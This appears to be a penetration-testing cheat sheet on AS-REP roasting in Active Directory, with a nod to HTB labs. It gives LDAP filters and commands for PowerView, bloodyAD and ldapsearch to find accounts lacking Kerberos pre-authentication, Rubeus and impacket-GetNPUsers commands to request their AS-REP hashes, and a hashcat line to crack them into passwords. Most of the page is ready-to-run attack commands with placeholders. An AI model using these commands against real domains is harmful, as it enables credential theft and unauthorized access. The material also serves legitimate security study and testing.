👾 Overview
If a user doesn’t have Kerberos pre-authentication required on their account, authentication can be requested from the DC without credentials. This results in a message that can be cracked to get the user’s password.
🔍 Discovery
Requirements:
- a connection to the DC
- Lack of Kerberos pre-authentication
- Domain account - optional but preferred
If attempting the attack unauthenticated, you’ll need to guess valid usernames, in labs like HTB this is a good technique to try if you’re able to find employee usernames on a website, etc. username-anarchy is a great tool for this.
If authenticated you can enumerate vulnerable users that don’t have Kerberos pre-authenticated required from LDAP:
Windows:
# Using PowerView
Get-DomainUser -PreauthNotRequired -verboseLinux:
# Using bloodyAD
bloodyAD -u [username] -p '[password]' -d [domain] --host [ip] get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
# Using ldapsearch
ldapsearch -x -LLL -H ldap://[ip] -D "[username]" -w [password] \ -b "[basedn]" \ "(&(objectClass=user)(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \ sAMAccountName📌 Exploitation
Windows:
# Using Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.hashLinux:
# With a list of users
impacket-GetNPUsers [DOMAIN]/ -usersfile user.list -format hashcat -outputfile asrep.hash -dc-ip [IP]
# With domain credentials - will automatically find targets
impacket-GetNPUsers [DOMAIN]/[USERNAME]:[PASSWORD] -request -format hashcat -outputfile asrep.hash
# With LDAP anonymous bind - will automatically find targets
impacket-GetNPUsers [DOMAIN]/ -format hashcat -outputfile asrep.hash -dc-ip [IP]If you encounter a Kerberos clock skew error, try this fix.
✨ Post-Exploitation
Once an AS-REP hash is obtained, it can be cracked using hashcat to obtain the user’s password.
# Simple dictionary attack
hashcat -a 0 -m 18200 asrep.hash [wordlist]